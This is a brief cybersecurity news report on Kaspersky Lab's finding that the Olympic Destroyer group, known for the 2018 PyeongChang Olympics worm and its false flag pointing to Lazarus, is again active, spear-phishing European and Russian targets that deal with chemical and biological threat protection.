Kaspersky Lab researchers tracking the Olympic Destroyer threat that famously struck the opening of the Winter Olympic Games in PyeongChang with a destructive network worm have discovered that the hacking group behind it is still active. It appears to be targeting Germany, France, Switzerland, the Netherlands, Ukraine and Russia, with a focus on organizations involved in protection against chemical and biological threats.
Olympic Destroyer is an advanced threat that hit organizers, suppliers and partners of the Winter Olympic Games 2018 in PyeongChang, South Korea with a cybersabotage operation based on a destructive network worm. Many indicators pointed in different directions for the origins of the attack, causing some confusion in the info-security industry in February 2018. A few rare and sophisticated signs discovered by Kaspersky Lab suggested that Lazarus group, a North Korea-linked threat actor, was behind the operation. However, in March, the company confirmed that the campaign featured an elaborate and convincing false flag operation, and Lazarus was unlikely to be the source. Researchers have now found the Olympic Destroyer operation is back in action, using some of its original infiltration and reconnaissance toolsets, and focusing on targets in Europe.
The threat actor is spreading its malware through spear-phishing documents that closely resemble the weaponized documents used in preparation for the Winter Olympics operation. All final payloads extracted from the malicious documents were designed to provide generic access to the compromised computers. An open-source and free framework, widely known as Powershell Empire, was used for the second stage of the attack.